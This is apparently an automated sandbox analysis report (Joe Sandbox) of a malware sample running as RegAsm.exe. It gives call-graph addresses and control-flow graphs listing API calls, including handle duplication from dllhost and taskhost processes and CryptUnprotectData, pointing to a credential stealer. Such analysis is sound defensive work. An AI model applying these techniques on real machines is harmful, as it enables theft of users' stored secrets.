11 API calls 39742->39780 39746->39727 39770 415c56 11 API calls 39746->39770 39749->39746 39773 422640 13 API calls 39749->39773 39774 4226e0 12 API calls 39749->39774 39751 42014c 39750->39751 39754 420151 39750->39754 39793 41e466 96 API calls 39751->39793 39753 420162 39753->39732 39754->39753 39755 4201b3 39754->39755 39756 420229 39754->39756 39757 4201b8 39755->39757 39758 4201dc 39755->39758 39756->39753 39759 41fd5e 85 API calls 39756->39759 39784 41fbdb 39757->39784 39758->39753 39763 4201ff 39758->39763 39790 41fc4c 39758->39790 39759->39753 39763->39753 39765 42013a 96 API calls 39763->39765 39765->39753 39766->39732 39767->39732 39768->39732 39769->39732 39770->39723 39771->39732 39772->39732 39773->39749 39774->39749 39775->39723 39776->39721 39777->39727 39778->39732 39779->39742 39780->39738 39781->39738 39782->39715 39783->39723 39785 41fbf8 39784->39785 39787 41fbf1 39784->39787 39798 41ee26 39785->39798 39789 41fc39 39787->39789 39808 4446ce 11 API calls 39787->39808 39789->39753 39794 41fd5e 39789->39794 39791 41ee6b 85 API calls 39790->39791 39792 41fc5d 39791->39792 39792->39758 39793->39754 39796 41fd65 39794->39796 39795 41fdab 39795->39753 39796->39795 39797 41fbdb 85 API calls 39796->39797 39797->39796 39799 41ee41 39798->39799 39800 41ee32 39798->39800 39809 41edad 39799->39809 39812 4446ce 11 API calls 39800->39812 39803 41ee3c 39803->39787 39806 41ee58 39806->39803 39814 41ee6b 39806->39814 39808->39789 39818 41be52 39809->39818 39812->39803 39813 41eb85 11 API calls 39813->39806 39815 41ee70 39814->39815 39816 41ee78 39814->39816 39856 41bf99 85 API calls 39815->39856 39816->39803 39819 41be6f 39818->39819 39820 41be5f 39818->39820 39825 41be8c 39819->39825 39850 418c63 memset memset 39819->39850 39849 4446ce 11 API calls 39820->39849 39823 41be69 39823->39803 39823->39813 39825->39823 39826 41bf3a 39825->39826 39827 41bed1 39825->39827 39837 41bee7 39825->39837 39853 4446ce 11 API calls 39826->39853 39829 41bef0 39827->39829 39832 41bee2 39827->39832 39830 41bf01 39829->39830 39829->39837 39831 41bf24 memset 39830->39831 39833 41bf14 39830->39833 39851 418a6d memset memcpy memset 39830->39851 39831->39823 39839 41ac13 39832->39839 39852 41a223 memset memcpy memset 39833->39852 39837->39823 39854 41a453 85 API calls 39837->39854 39838 41bf20 39838->39831 39840 41ac52 39839->39840 39841 41ac3f memset 39839->39841 39844 41ac6a 39840->39844 39855 41dc14 19 API calls 39840->39855 39842 41acd9 39841->39842 39842->39837 39845 41aca1 39844->39845 39846 41519d 6 API calls 39844->39846 39845->39842 39847 41acc0 memset 39845->39847 39848 41accd memcpy 39845->39848 39846->39845 39847->39842 39848->39842 39849->39823 39850->39825 39851->39833 39852->39838 39853->39837 39855->39844 39856->39816 39857 417bc5 39858 417bda 39857->39858 39860 417c61 39857->39860 39859 417bf6 UnmapViewOfFile CloseHandle 39858->39859 39858->39860 39862 417c2c 39858->39862 39864 4175b7 39858->39864 39859->39858 39859->39859 39862->39858 39869 41851e 18 API calls 39862->39869 39865 4175d6 CloseHandle 39864->39865 39866 4175c8 39865->39866 39867 4175df 39865->39867 39866->39867 39868 4175ce Sleep 39866->39868 39867->39858 39868->39865 39869->39862 39870 4152c6 malloc 39871 4152e2 39870->39871 39872 4152ef 39870->39872 39874 416760 11 API calls 39872->39874 39874->39871 39875 4148b6 FindResourceW 39876 4148cf SizeofResource 39875->39876 39879 4148f9 39875->39879 39877 4148e0 LoadResource 39876->39877 39876->39879 39878 4148ee LockResource 39877->39878 39877->39879 39878->39879 39880 441b3f 39890 43a9f6 39880->39890 39882 441b61 40063 4386af memset 39882->40063 39884 44189a 39885 4418e2 39884->39885 39889 442bd4 39884->39889 39888 4418ea 39885->39888 40064 4414a9 12 API calls 39885->40064 39889->39888 40065 441409 memset 39889->40065 39891 43aa20 39890->39891 39899 43aadf 39890->39899 39892 43aa34 memset 39891->39892 39891->39899 39893 43aa56 39892->39893 39894 43aa4d 39892->39894 40066 43a6e7 39893->40066 40074 42c02e memset 39894->40074 39899->39882 39900 43aad3 40076 4169a7 11 API calls 39900->40076 39901 43aaae 39901->39899 39901->39900 39916 43aae5 39901->39916 39903 43ac18 39905 43ac47 39903->39905 40078 42bbd5 memcpy memcpy memcpy memset memcpy 39903->40078 39906 43aca8 39905->39906 40079 438eed 16 API calls 39905->40079 39910 43acd5 39906->39910 40081 4233ae 11 API calls 39906->40081 39909 43ac87 40080 4233c5 16 API calls 39909->40080 40082 423426 11 API calls 39910->40082 39914 43ace1 40083 439811 162 API calls 39914->40083 39915 43a9f6 160 API calls 39915->39916 39916->39899 39916->39903 39916->39915 40077 439bbb 22 API calls 39916->40077 39918 43acfd 39924 43ad2c 39918->39924 40084 438eed 16 API calls 39918->40084 39920 43ad19 40085 4233c5 16 API calls 39920->40085 39921 43ad58 40086 44081d 162 API calls 39921->40086 39924->39921 39927 43add9 39924->39927 39926 43ae3a memset 39928 43ae73 39926->39928 39927->39927 40090 423426 11 API calls 39927->40090 40091 42e1c0 146 API calls 39928->40091 39929 43adab 40088 438c4e 162 API calls 39929->40088 39931 43ad6c 39931->39899 39931->39929 40087 42370b memset memcpy memset 39931->40087 39933 43ae96 40092 42e1c0 146 API calls 39933->40092 39935 43adcc 40089 440f84 12 API calls 39935->40089 39938 43aea8 39946 43aec1 39938->39946 40093 42e199 146 API calls 39938->40093 39940 43af00 39940->39899 39944 43af1a 39940->39944 39945 43b3d9 39940->39945 39942 43b60f 39942->39899 40154 4393a5 17 API calls 39942->40154 40095 438eed 16 API calls 39944->40095 39950 43b3f6 39945->39950 39957 43b4c8 39945->39957 39946->39940 40094 42e1c0 146 API calls 39946->40094 39948 43af2f 40096 4233c5 16 API calls 39948->40096 40136 432878 12 API calls 39950->40136 39952 43af51 40097 423426 11 API calls 39952->40097 39955 43af7d 40098 423426 11 API calls 39955->40098 39956 43b4f2 40143 43a76c 21 API calls 39956->40143 39957->39956 40142 42bbd5 memcpy memcpy memcpy memset memcpy 39957->40142 39961 43b529 40144 44081d 162 API calls 39961->40144 39962 43b462 40138 423330 11 API calls 39962->40138 39963 43af94 40099 423330 11 API calls 39963->40099 39967 43b47e 39971 43b497 39967->39971 40139 42374a memcpy memset memcpy memcpy memcpy 39967->40139 39968 43b544 39972 43b55c 39968->39972 40145 42c02e memset 39968->40145 39969 43b428 39969->39962 40137 432b60 16 API calls 39969->40137 39970 43afca 40100 423330 11 API calls 39970->40100 40140 4233ae 11 API calls 39971->40140 40146 43a87a 162 API calls 39972->40146 39977 43afdb 40101 4233ae 11 API calls 39977->40101 39979 43b4b1 40141 423399 11 API calls 39979->40141 39981 43b56c 39982 43b58a 39981->39982 40147 423330 11 API calls 39981->40147 40148 440f84 12 API calls 39982->40148 39984 43afee 40102 44081d 162 API calls 39984->40102 39987 43b4c1 40150 42db80 162 API calls 39987->40150 39990 43b592 40149 43a82f 16 API calls 39990->40149 39993 43b5b4 40151 438c4e 162 API calls 39993->40151 39995 43b5cf 40152 42c02e memset 39995->40152 39997 43b005 39997->39899 40000 43b01f 39997->40000 40103 42d836 162 API calls 39997->40103 39998 43b1ef 40113 4233c5 16 API calls 39998->40113 40000->39998 40111 423330 11 API calls 40000->40111 40112 42d71d 162 API calls 40000->40112 40001 43b212 40114 423330 11 API calls 40001->40114 40004 43add4 40004->39942 40153 438f86 16 API calls 40004->40153 40007 43b087 40104 4233ae 11 API calls 40007->40104 40009 43b22a 40115 42ccb5 11 API calls 40009->40115 40011 43b10f 40107 423330 11 API calls 40011->40107 40012 43b23f 40116 4233ae 11 API calls 40012->40116 40014 43b257 40117 4233ae 11 API calls 40014->40117 40018 43b129 40108 4233ae 11 API calls 40018->40108 40019 43b26e 40118 4233ae 11 API calls 40019->40118 40022 43b09a 40022->40011 40105 42cc15 19 API calls 40022->40105 40106 4233ae 11 API calls 40022->40106 40023 43b282 40119 43a87a 162 API calls 40023->40119 40025 43b13c 40109 440f84 12 API calls 40025->40109 40027 43b29d 40120 423330 11 API calls 40027->40120 40030 43b15f 40110 4233ae 11 API calls 40030->40110 40031 43b2af 40033 43b2b8 40031->40033 40034 43b2ce 40031->40034 40121 4233ae 11 API calls 40033->40121 40122 440f84 12 API calls 40034->40122 40037 43b2c9 40124 4233ae 11 API calls 40037->40124 40038 43b2da 40123 42370b memset memcpy memset 40038->40123 40041 43b2f9 40125 423330 11 API calls 40041->40125 40043 43b30b 40126 423330 11 API calls 40043->40126 40045 43b325 40127 423399 11 API calls 40045->40127 40047 43b332 40128 4233ae 11 API calls 40047->40128 40049 43b354 40129 423399 11 API calls 40049->40129 40051 43b364 40130 43a82f 16 API calls 40051->40130 40053 43b370 40131 42db80 162 API calls 40053->40131 40055 43b380 40132 438c4e 162 API calls 40055->40132 40057 43b39e 40133 423399 11 API calls 40057->40133 40059 43b3ae 40134 43a76c 21 API calls 40059->40134 40061 43b3c3 40135 423399 11 API calls 40061->40135 40063->39884 40064->39888 40065->39889 40067 43a6f5 40066->40067 40068 43a765 40066->40068 40067->40068 40155 42a115 40067->40155 40068->39899 40075 4397fd memset 40068->40075 40072 43a73d 40072->40068 40073 42a115 146 API calls 40072->40073 40073->40068 40074->39893 40075->39901 40076->39899 40077->39916 40078->39905 40079->39909 40080->39906 40081->39910 40082->39914 40083->39918 40084->39920 40085->39924 40086->39931 40087->39929 40088->39935 40089->40004 40090->39926 40091->39933 40092->39938 40093->39946 40094->39946 40095->39948 40096->39952 40097->39955 40098->39963 40099->39970 40100->39977 40101->39984 40102->39997 40103->40007 40104->40022 40105->40022 40106->40022 40107->40018 40108->40025 40109->40030 40110->40000 40111->40000 40112->40000 40113->40001 40114->40009 40115->40012 40116->40014 40117->40019 40118->40023 40119->40027 40120->40031 40121->40037 40122->40038 40123->40037 40124->40041 40125->40043 40126->40045 40127->40047 40128->40049 40129->40051 40130->40053 40131->40055 40132->40057 40133->40059 40134->40061 40135->40004 40136->39969 40137->39962 40138->39967 40139->39971 40140->39979 40141->39987 40142->39956 40143->39961 40144->39968 40145->39972 40146->39981 40147->39982 40148->39990 40149->39987 40150->39993 40151->39995 40152->40004 40153->39942 40154->39899 40156 42a175 40155->40156 40158 42a122 40155->40158 40156->40068 40161 42b13b 146 API calls 40156->40161 40158->40156 40159 42a115 146 API calls 40158->40159 40162 43a174 40158->40162 40186 42a0a8 146 API calls 40158->40186 40159->40158 40161->40072 40176 43a196 40162->40176 40177 43a19e 40162->40177 40163 43a306 40163->40176 40202 4388c4 14 API calls 40163->40202 40166 42a115 146 API calls 40166->40177 40167 415a91 memset 40167->40177 40168 43a642 40168->40176 40206 4169a7 11 API calls 40168->40206 40172 43a635 40205 42c02e memset 40172->40205 40176->40158 40177->40163 40177->40166 40177->40167 40177->40176 40187 42ff8c 40177->40187 40195 4165ff 40177->40195 40198 439504 13 API calls 40177->40198 40199 4312d0 146 API calls 40177->40199 40200 42be4c memcpy memcpy memcpy memset memcpy 40177->40200 40201 43a121 11 API calls 40177->40201 40179 42bf4c 14 API calls 40181 43a325 40179->40181 40180 4169a7 11 API calls 40180->40181 40181->40168 40181->40172 40181->40176 40181->40179 40181->40180 40182 42b5b5 memset memcpy 40181->40182 40185 4165ff 11 API calls 40181->40185 40203 42b63e 14 API calls 40181->40203 40204 42bfcf memcpy 40181->40204 40182->40181 40185->40181 40186->40158 40207 43817e 40187->40207 40189 42ff99 40190 42ff9d 40189->40190 40191 42ffe3 40189->40191 40192 42ffd0 40189->40192 40190->40177 40212 4169a7 11 API calls 40191->40212 40211 4169a7 11 API calls 40192->40211 40196 4165a0 11 API calls 40195->40196 40197 41660d 40196->40197 40197->40177 40198->40177 40199->40177 40200->40177 40201->40177 40202->40181 40203->40181 40204->40181 40205->40168 40206->40176 40208 438187 40207->40208 40210 438192 40207->40210 40213 4380f6 40208->40213 40210->40189 40211->40190 40212->40190 40215 43811f 40213->40215 40214 438164 40214->40210 40215->40214 40218 437e5e 40215->40218 40241 4300e8 memset memset memcpy 40215->40241 40242 437d3c 40218->40242 40220 437eb3 40220->40215 40221 437ea9 40221->40220 40225 437f22 40221->40225 40257 41f432 40221->40257 40224 437f06 40304 415c56 11 API calls 40224->40304 40228 437f7f 40225->40228 40229 432d4e 3 API calls 40225->40229 40227 437f95 40305 415c56 11 API calls 40227->40305 40228->40227 40230 43802b 40228->40230 40229->40228 40232 4165ff 11 API calls 40230->40232 40233 438054 40232->40233 40268 437371 40233->40268 40236 43806b 40237 438094 40236->40237 40306 42f50e 137 API calls 40236->40306 40239 437fa3 40237->40239 40307 4300e8 memset memset memcpy 40237->40307 40239->40220 40308 41f638 103 API calls 40239->40308 40241->40215 40243 437d69 40242->40243 40246 437d80 40242->40246 40309 437ccb 11 API calls 40243->40309 40245 437d76 40245->40221 40246->40245 40247 437d90 40246->40247 40249 437da3 40246->40249 40247->40245 40313 437ccb 11 API calls 40247->40313 40250 438460 133 API calls 40249->40250 40253 437dcb 40250->40253 40251 437de8 40312 424f26 122 API calls 40251->40312 40253->40251 40310 444283 13 API calls 40253->40310 40255 437dfc 40311 437ccb 11 API calls 40255->40311 40258 41f54d 40257->40258 40261 41f44f 40257->40261 40259 41f466 40258->40259 40343 41c635 memset memset 40258->40343 40259->40224 40259->40225 40261->40259 40266 41f50b 40261->40266 40314 41f1a5 40261->40314 40339 41c06f memcmp 40261->40339 40340 41f3b1 89 API calls 40261->40340 40341 41f398 85 API calls 40261->40341 40266->40258 40266->40259 40342 41c295 85 API calls 40266->40342 40269 41703f 11 API calls 40268->40269 40270 437399 40269->40270 40271 43739d 40270->40271 40273 4373ac 40270->40273 40344 4446ea 11 API calls 40271->40344 40274 416935 16 API calls 40273->40274 40287 4373ca 40274->40287 40275 4375bc 40352 415c7d 16 API calls 40275->40352 40276 438460 133 API calls 40276->40287 40279 4375d2 40302 4373a7 40279->40302 40353 4442e6 11 API calls 40279->40353 40280 4251c4 136 API calls 40280->40287 40282 4375e2 40282->40302 40354 444283 13 API calls 40282->40354 40285 415a91 memset 40285->40287 40286 4375f4 40295 437620 40286->40295 40296 43760b 40286->40296 40287->40276 40287->40280 40287->40285 40289 43758f 40287->40289 40297 437584 40287->40297 40303 437d3c 134 API calls 40287->40303 40345 425433 13 API calls 40287->40345 40346 425413 17 API calls 40287->40346 40347 42533e 16 API calls 40287->40347 40348 42538f 16 API calls 40287->40348 40349 42453e 122 API calls 40287->40349 40350 42453e 122 API calls 40289->40350 40292 43759f 40294 416935 16 API calls 40292->40294 40294->40297 40299 416935 16 API calls 40295->40299 40355 444283 13 API calls 40296->40355 40297->40275 40351 42453e 122 API calls 40297->40351 40299->40302 40301 437612 memcpy 40301->40302 40302->40236 40303->40287 40304->40220 40305->40239 40306->40237 40307->40239 40308->40220 40309->40245 40310->40255 40311->40251 40312->40245 40313->40245 40315 41bc3b 100 API calls 40314->40315 40316 41f1b4 40315->40316 40317 41edad 85 API calls 40316->40317 40324 41f282 40316->40324 40318 41f1cb 40317->40318 40319 41f1f5 memcmp 40318->40319 40320 41f20e 40318->40320 40318->40324 40319->40320 40321 41f21b memcmp 40320->40321 40320->40324 40322 41f326 40321->40322 40325 41f23d 40321->40325 40323 41ee6b 85 API calls 40322->40323 40322->40324 40323->40324 40324->40261 40325->40322 40326 41f28e memcmp 40325->40326 40328 41c8df 55 API calls 40325->40328 40326->40322 40327 41f2a9 40326->40327 40327->40322 40330 41f308 40327->40330 40331 41f2d8 40327->40331 40329 41f269 40328->40329 40329->40322 40332 41f287 40329->40332 40333 41f27a 40329->40333 40330->40322 40337 4446ce 11 API calls 40330->40337 40334 41ee6b 85 API calls 40331->40334 40332->40326 40335 41ee6b 85 API calls 40333->40335 40336 41f2e0 40334->40336 40335->40324 40338 41b1ca memset 40336->40338 40337->40322 40338->40324 40339->40261 40340->40261 40341->40261 40342->40258 40343->40259 40344->40302 40345->40287 40346->40287 40347->40287 40348->40287 40349->40287 40350->40292 40351->40275 40352->40279 40353->40282 40354->40286 40355->40301 40356 41493c EnumResourceNamesW 40357 44660a 40360 4465e4 40357->40360 40359 446613 40361 4465f3 __dllonexit 40360->40361 40362 4465ed _onexit 40360->40362 40361->40359 40362->40361

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 353->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                APIs
                                                                • memset.MSVCRT ref: 0040DDAD
                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                • CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                • _wcsicmp.MSVCRT ref: 0040DED8
                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                • memset.MSVCRT ref: 0040DF5F
                                                                • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                • API String ID: 2018390131-3398334509
                                                                • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                APIs
                                                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                  • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                                • String ID:
                                                                • API String ID: 2947809556-0
                                                                • Opcode ID: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                                • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                • Opcode Fuzzy Hash: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                                • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                APIs
                                                                • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
                                                                • String ID:
                                                                • API String ID: 1945712969-0
                                                                • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                • FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: FileFind$FirstNext
                                                                • String ID:
                                                                • API String ID: 1690352074-0
                                                                • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                APIs
                                                                • memset.MSVCRT ref: 0041898C
                                                                • GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: InfoSystemmemset
                                                                • String ID:
                                                                • API String ID: 3558857096-0
                                                                • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-445580 call 4136c0 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 42 445823-445826 14->42 15->16 22 445672-445683 call 40a889 call 403fbe 16->22 23 4455fb-445601 16->23 49 445879-44587c 18->49 24 44594f-445958 19->24 25 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->25 82 445685 22->82 83 4456b2-4456b5 call 40b1ab 22->83 34 445605-445607 23->34 35 445603 23->35 32 4459f2-4459fa 24->32 33 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 24->33 134 44592d-445945 call 40b6ef 25->134 135 44594a 25->135 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 32->44 45 445b29-445b32 32->45 153 4459d0-4459e8 call 40b6ef 33->153 154 4459ed 33->154 34->22 41 445609-44560d 34->41 35->34 38->3 62 445585-44558c call 41366b 39->62 41->22 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 63 4458a2-4458aa call 40b1ab 49->63 64 44587e 49->64 150 445665-445670 call 40b1ab 50->150 151 445643-445663 call 40a9b5 call 4087b3 50->151 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 87 445fae-445fb2 60->87 88 445d2b-445d3b 60->88 168 445cf5 61->168 169 445cfc-445d03 61->169 62->38 63->19 80 445884-44589d call 40a9b5 call 4087b3 64->80 137 445849 66->137 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 156 44589f 80->156 81->53 99 44568b-4456a4 call 40a9b5 call 4087b3 82->99 115 4456ba-4456c4 83->115 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->90 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 129 4457f9 115->129 130 4456ca-4456d3 call 413cfa call 413d4c 115->130 129->6 172 4456d8-4456f7 call 40b2cc call 413fa6 130->172 134->135 135->24 137->51 150->115 151->150 153->154 154->32 156->63 158->83 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->87 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 